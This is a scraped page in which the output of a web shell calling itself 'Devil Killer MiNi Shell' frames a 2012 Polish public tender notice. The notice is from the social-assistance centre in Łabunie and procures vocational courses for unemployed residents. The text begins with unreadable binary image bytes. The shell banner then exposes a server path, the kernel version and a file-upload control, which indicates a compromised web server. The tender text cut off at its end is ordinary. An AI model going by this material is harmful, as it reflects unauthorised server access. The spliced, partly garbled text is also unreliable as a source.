JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120810/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120810/173161-N-2012.html

<p class="kh_header"><b>Łabunie: Szkolenia dla uczestników projektu systemowego Wyjść z cienia w roku 2012 z terenu Gminy Łabunie współfinansowanego przez Unię Europejską w ramach
Europejskiego Funduszu Społecznego realizowanego w ramach POKL VII 7.1.1 przez Gminny Ośrodek Pomocy Społecznej w Łabuniach</b><br>
<b>Numer ogłoszenia: 173161 - 2012; data zamieszczenia: 10.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek Pomocy Społecznej w Łabuniach , ul. Orzechowa 10, 22-437 Łabunie, woj. lubelskie, tel. 84 6113008, faks 84 6113008.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.labunie.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Szkolenia dla uczestników projektu systemowego Wyjść z cienia w roku 2012 z terenu Gminy Łabunie współfinansowanego przez Unię Europejską w ramach
Europejskiego Funduszu Społecznego realizowanego w ramach POKL VII 7.1.1 przez Gminny Ośrodek Pomocy Społecznej w Łabuniach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres zamówienia obejmuje usługi
polegające na prowadzeniu szkoleń dla osób bezrobotnych, w wieku aktywności zawodowej zagrożonych
wykluczeniem społecznym, korzystających ze świadczeń pomocy społecznej, skierowanych na szkolenia przez
Gminny Ośrodek Pomocy Społecznej w Łabuniach w zakresie: zadanie 1 - kurs kucharz dla 9 osób, zadanie 2 -
kurs cukiernik dla 4 osób, zadanie 3 - kurs prawo jazdy kat B dla 8 osób, zadanie 4 - kurs obsługa kasy fiskalnej z
fakturowaniem dla 3 osób, zadanie 5 - kurs bukieciarstwo i aranżacje roślinne dla 2 osób, zadanie 6 - kurs
opiekun osoby chorej i niepełnosprawnej dla 2 osób, zadanie 7 - szkolenie grupowe i indywidualne z zakresu
doradztwa zawodowego dla 16 osób, zadanie 8 - Trening kompetencji i umiejętności społecznych w formie
szkolenia wyjazdowego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających na podstawie art. 67 ust. 1 pkt. 6 ustawy Pzp, stanowiących nie więcej niż 50 % wartości zamówienia podstawowego w każdym zadaniu i polegających na powtórzeniu tego samego rodzaju zamówień</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.41.12.00-0, 80.57.00.00-0, 55.00.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie ma wymogu wnoszenia wadium przez wykonawców</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Jako spełniający warunki udziału w postępowaniu zostaną ocenieni wykonawcy, którzy: a) dotyczy zadań:
1 - 7: wykażą wykonanie minimum 1 szkolenia, kursu lub warsztatów w zakresie odpowiadającym
przedmiotowi szkolenia lub warsztatom w danym zadaniu w ciągu ostatnich trzech lat przed upływem
terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie tj.: zadanie 1
- kurs kucharz, zadanie 2 - kurs cukiernik, zadanie 3 - kurs prawo jazdy kat B, zadanie 4 - kurs obsługa
kasy fiskalnej, zadanie 5 - kurs bukieciarstwo zadanie 6 - kurs opiekun osoby chorej i/lub
niepełnosprawnej, zadanie 7- szkolenie z zakresu doradztwa zawodowego; b) dotyczy zadania nr 8:
wykażą wykonanie minimum 2 usług polegających na zorganizowaniu i przeprowadzaniu minimum
2-dniowego szkolenia wyjazdowego dotyczącego treningu kompetencji i/lub umiejętności społecznych dla
co najmniej 10 osób o wartości każdego szkolenia wyjazdowego co najmniej 20 000 zł w ciągu ostatnich
trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w
tym okresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Formularz ofertowy - w przypadku składania oferty przez podmioty występujące wspólnie należy podać nazwy
(firmy) oraz dokładne adresy wszystkich wykonawców składających ofertę wspólną. 2.Oświadczenie o części
zamówienia, której wykonanie, wykonawca zamierza powierzyć podwykonawcom w przypadku powierzenia przez
wykonawcę części zamówienia podwykonawcom. 3.Pełnomocnictwo do reprezentowania w postępowaniu albo do
reprezentowania w postępowaniu i zawarcia umowy, w przypadku wykonawców wspólnie ubiegających się o
udzielenie zamówienia zgodnie z art. 23 ustawy Prawo zamówień publicznych (dotyczy również wspólników spółki
cywilnej). 4.Pełnomocnictwo do występowania w imieniu wykonawcy, w przypadku gdy dokumentów składających
się na ofertę nie podpisuje osoba uprawniona do reprezentowania wykonawcy lub wykonawca - w przypadku osób fizycznych. 5. Wykonawca w sytuacji, gdy polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach
finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w
szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji
niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. 6. Jeżeli w miejscu
zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się
dokumentów, o których mowa w III.4.3), zastępuje się je dokumentem zawierającym oświadczenie złożone przed
notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub
gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce
zamieszkania - wystawionym nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Strony przewidują następujące rodzaje i warunki zmiany treści umowy: 1) zmianę terminu szkolenia: a) gdy
wykonanie zamówienia w określonym pierwotnie terminie nie leży w interesie Zamawiającego; b) w przypadku
działania siły wyższej, uniemożliwiającej wykonanie umowy w określonym pierwotnie terminie. 2. Zmiany umowy
przewidziane w pkt 1 dopuszczalne są na następujących warunkach: 1) zmiana terminu szkolenia: a) lit. a) - o
okres umożliwiający osiągnięcie uzasadnionego interesu Zamawiającego, b) lit. b) - o okres działania siły wyższej
oraz potrzebny do usunięcia skutków tego działania</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.labunie.bip.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Ośrodek Pomocy Społecznej w Łabuniach, ul. Orzechowa 10, 22-437 Łabunie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.08.2012 godzina 09:00, miejsce: Gminny Ośrodek Pomocy Społecznej w Łabuniach, ul. Orzechowa 10, 22-437 Łabunie,
pokój nr 5.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Szkolenia dla uczestników projektu systemowego Wyjść z cienia w roku 2012 z terenu Gminy
Łabunie współfinansowany jest prez Unię Europejską w ramach Europejskiego Funduszu Społecznego
realizowanego w ramach POKL VII 7.1.1 przez Gminny Ośrodek Pomocy Społecznej w Łabuniach. 2. Osobą
upoważnioną do kontaktowania się z wykonawcami jest: P. Justyna Żuk - Gminny Ośrodek Pomocy w Łabuniach,
ul. Orzechowa 10 22-437 Łabunie, telefon (084 6113008). 3. Termin wykonania zamówienia: zadanie 1 -
rozpoczęcie: 10.09.2012 r. Zakończenie: 10.10.2012 r. zadanie 2 - rozpoczęcie: 11.10.2012 r. Zakończenie:
05.11.2012 r. zadanie 3 - rozpoczęcie: 11.10.2012 r. Zakończenie: 10.12.2012 r. zadanie 4 - rozpoczęcie:
05.11.2012 r. Zakończenie: 30.11.2012 r. zadanie 5 - rozpoczęcie: 10.09.2012 r. Zakończenie: 10.10.2012 r.
zadanie 6 - rozpoczęcie: 10.09.2012 r. Zakończenie: 10.10.2012 r. zadanie 7 - rozpoczęcie: 03.09.2012 r.
Zakończenie: 09.09.2012 r. zadanie 8 - I termin w dniach 24.09.2012 r. - 28.09.2012 r., lub II termin
22.10.2012 r. - 26.10.2012 r..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> kurs kucharz dla 9 osób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 1 - kurs kucharz - organizację
i przeprowadzanie kursu pod nazwą kucharz dla 9 osób, Ilość godzin kursu musi wynosić 140 godzin lekcyjnych
Ilość godzin szkolenia: teoretycznego - 40 godzin lekcyjnych, szkolenia praktycznego - 100 godzin lekcyjnych
Dzienny wymiar zajęć nie powinien przekroczyć 8 godzin lekcyjnych, wymagamy, aby po każdych 2 godzinach
lekcyjnych zajęć edukacyjnych przewidziana była przerwa 15-to minutowa. Zajęcia muszą odbyć się od
poniedziałku do piątku w dni robocze w godzinach od 8:00 do 18:00 (8 godzin lekcyjnych dziennie), a po
uzyskaniu zgody uczestnika kursu, także w dni wolne od pracy. Przerwy między zajęciami nie pomniejszają
wymaganego wymiaru godzin zajęć edukacyjnych w ciągu dnia, tj. 8 godzin lekcyjnych dziennie. Szkolenie
musi zakończyć się egzaminem wewnętrznym. Miejsce realizacji szkolenia teoretycznego - pomieszczenia
jednostki szkoleniowej. Miejsce szkolenia praktycznego zapewnia Wykonawca. W uzgodnieniu z uczestnikiem
projektu dopuszcza się możliwość odbywania zajęć praktycznych poza Miastem Zamość. W takim przypadku
Wykonawca zapewnia transport uczestnika do miejsca odbywania praktycznej nauki zawodu i powrót do Miasta
Zamość. Zajęcia praktyczne muszą odbyć się na terenie powiatu zamojskiego. Każdy uczestnik szkolenia
winien otrzymać na własność materiały dydaktyczne niezbędne do realizacji szkolenia: materiały szkoleniowe w
formie papierowej, notes, długopis, ołówek. Materiały dydaktyczne muszą być nowe i oznakowane logotypami.
Warunki lokalowe, sale szkoleniowe, także w miejscu szkolenia praktycznego oraz wykorzystywany sprzęt
muszą spełniać wymogi prawne w zakresie BHP i p. poż. Sale szkoleniowe muszą być oznakowane logotypami.
Zajęcia szkolenia teoretycznego i praktycznego w ramach kursu zrealizują nauczyciele Wykonawcy, którzy posiadają odpowiednie kwalifikacje zawodowe, doświadczenie i wykształcenie niezbędne do wykonania
zamówienia. Wykonawca zapewnia także: ubranie robocze, podstawowe narzędzia pracy, materiały niezbędne
do realizacji zajęć, materiały szkoleniowe (w tym materiały biurowe i piśmiennicze), ubezpieczenie na okres
kursu, egzamin wewnętrzny i wydanie zaświadczenia o ukończeniu szkolenia. Osoby, które ukończą szkolenie z
wynikiem pozytywnym muszą otrzymać zaświadczenie o ukończeniu kursu zawodowego (zgodnie z
rozporządzeniem Ministra Edukacji i Nauki z dnia 3 lutego 2006 r. w sprawie uzyskiwania i uzupełnienia przez
osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. z
2006r. nr 31 poz. 216 z późn. zm.). W przypadku zlecenia organizacji i realizacji kursu, Wykonawca będzie
prowadził dokumentację szkolenia tj. imienne listy obecności z każdego dnia szkolenia, dziennik zajęć, imienne
listy odbioru materiałów szkoleniowych, protokoły z egzaminów. Potwierdzone za zgodność z oryginałem
kserokopie dokumentów kursu, kserokopie zaświadczeń o ukończeniu kursu zawodowego oraz zdjęcia -
fotografie z przeprowadzonego kursu w ilości minimum 30 zdjęć na płycie CD, Wykonawca przekaże
Zamawiającemu. Kurs wyuczający na uprawnienia w zawodzie kucharz, w przypadku zlecenia jego organizacji i
realizacji, Wykonawca zrealizuje w oparciu o program szkolenia spełniający zasady i warunki podnoszenia
kwalifikacji zawodowych i wykształcenia ogólnego osób dorosłych, a także spełniający określone dla tych
zawodów standardy kwalifikacji i szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> kurs cukiernik dla 4 osób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 2 - kurs cukiernik -
organizację i przeprowadzanie kursu pod nazwą cukiernik dla 4 osób, Ilość godzin kursu musi wynosić 90
godzin lekcyjnych Ilość godzin szkolenia: teoretycznego - 35 godzin lekcyjnych, szkolenia praktycznego - 55
godzin lekcyjnych Dzienny wymiar zajęć nie powinien przekroczyć 8 godzin lekcyjnych, wymagamy, aby po
każdych 2 godzinach lekcyjnych zajęć edukacyjnych przewidziana była przerwa 15-to minutowa. Zajęcia muszą
odbyć się od poniedziałku do piątku w dni robocze w godzinach od 8:00 do 18:00 (8 godzin lekcyjnych
dziennie), a po uzyskaniu zgody uczestnika kursu, także w dni wolne od pracy. Przerwy między zajęciami nie
pomniejszają wymaganego wymiaru godzin zajęć edukacyjnych w ciągu dnia, tj. 8 godzin lekcyjnych dziennie.
Szkolenie musi zakończyć się egzaminem wewnętrznym. Miejsce realizacji szkolenia teoretycznego -
pomieszczenia jednostki szkoleniowej. Miejsce szkolenia praktycznego zapewnia Wykonawca. W uzgodnieniu z
uczestnikiem projektu dopuszcza się możliwość odbywania zajęć praktycznych poza Miastem Zamość. W takim
przypadku Wykonawca zapewnia transport uczestnika do miejsca odbywania praktycznej nauki zawodu i
powrót do Miasta Zamość. Zajęcia praktyczne muszą odbyć się na terenie powiatu zamojskiego. Każdy
uczestnik szkolenia winien otrzymać na własność materiały dydaktyczne niezbędne do realizacji szkolenia:
materiały szkoleniowe w formie papierowej, notes, długopis, ołówek. Materiały dydaktyczne muszą być nowe i
oznakowane logotypami. Warunki lokalowe, sale szkoleniowe, także w miejscu szkolenia praktycznego oraz
wykorzystywany sprzęt muszą spełniać wymogi prawne w zakresie BHP i p. poż. Sale szkoleniowe muszą być
oznakowane logotypami. Zajęcia szkolenia teoretycznego i praktycznego w ramach kursu zrealizują nauczyciele Wykonawcy, którzy posiadają odpowiednie kwalifikacje zawodowe, doświadczenie i wykształcenie niezbędne do
wykonania zamówienia. Wykonawca zapewnia także: ubranie robocze, podstawowe narzędzia pracy, materiały
niezbędne do realizacji zajęć, materiały szkoleniowe (w tym materiały biurowe i piśmiennicze), ubezpieczenie
na okres kursu, egzamin wewnętrzny i wydanie zaświadczenia o ukończeniu szkolenia. Osoby, które ukończą
szkolenie z wynikiem pozytywnym muszą otrzymać zaświadczenie o ukończeniu kursu zawodowego (zgodnie z
rozporządzeniem Ministra Edukacji i Nauki z dnia 3 lutego 2006 r. w sprawie uzyskiwania i uzupełnienia przez
osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. z
2006r. nr 31 poz. 216 z późn. zm.). W przypadku zlecenia organizacji i realizacji kursu, Wykonawca będzie
prowadził dokumentację szkolenia tj. imienne listy obecności z każdego dnia szkolenia, dziennik zajęć, imienne
listy odbioru materiałów szkoleniowych, protokoły z egzaminów. Potwierdzone za zgodność z oryginałem
kserokopie dokumentów kursu, kserokopie zaświadczeń o ukończeniu kursu zawodowego oraz zdjęcia -
fotografie z przeprowadzonego kursu w ilości minimum 30 zdjęć na płycie CD, Wykonawca przekaże
Zamawiającemu. Kurs wyuczający na uprawnienia w zawodzie cukiernik, w przypadku zlecenia jego organizacji
i realizacji, Wykonawca zrealizuje w oparciu o program szkolenia spełniający zasady i warunki podnoszenia
kwalifikacji zawodowych i wykształcenia ogólnego osób dorosłych, a także spełniający określone dla tych
zawodów standardy kwalifikacji i szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 05.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> zadanie 3 - kurs prawo jazdy kat B dla 8 osób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 3 kurs prawo jazdy kategorii B
-- organizację i realizację kursu na prawo jazdy kategorii B - dla 8 osób wraz z badaniami lekarskimi oraz ze
zgłoszeniem i wniesieniem opłaty za egzamin państwowy w Wojewódzkim Ośrodku Ruchu Drogowego w
Zamościu osób, które z pozytywnym wynikiem ukończą szkolenie. Zgłoszenie i przystąpienie do egzaminu
państwowego na prawo jazdy, powinno nastąpić po zakończeniu szkolenia. Uczestnicy powinni przystąpić do
egzaminu państwowego na prawo jazdy najpóźniej do dnia 10 grudnia 2012 r. Realizacja kursu w zakresie
zajęć powinna być planowana 6 dni w tygodniu od poniedziałku do soboty w godzinach od 8:00 do 18:00.
Dzienny wymiar zajęć teoretycznych nie powinien przekroczyć 8 godzin lekcyjnych, wymagamy, aby po
każdych 2 godzinach lekcyjnych zajęć edukacyjnych przewidziana była przerwa 15-to minutowa, przerwy
między zajęciami nie pomniejszają wymaganego wymiaru godzin zajęć edukacyjnych w ciągu dnia, tj. 8 godzin
lekcyjnych dziennie, zaleca się aby zajęcia kończyły się nie później niż o godz. 18:00. Zajęcia praktyczne
Wykonawca zrealizuje według indywidualnych harmonogramów ustalonych z Zamawiającym, uwzględniając
możliwości czasowe osób kierowanych na szkolenie. Ilość godzin szkolenia - 60 godzin, w tym 30 godzin
lekcyjnych szkolenia teoretycznego i 30 godzin zegarowych szkolenia praktycznego. Miejsce realizacji szkolenia
teoretycznego - pomieszczenia jednostki szkoleniowej. Miejsce realizacji szkolenia praktycznego - Miasto
Zamość. Warunki lokalowe, sale szkoleniowe oraz wykorzystywany sprzęt muszą spełniać wymogi prawne w
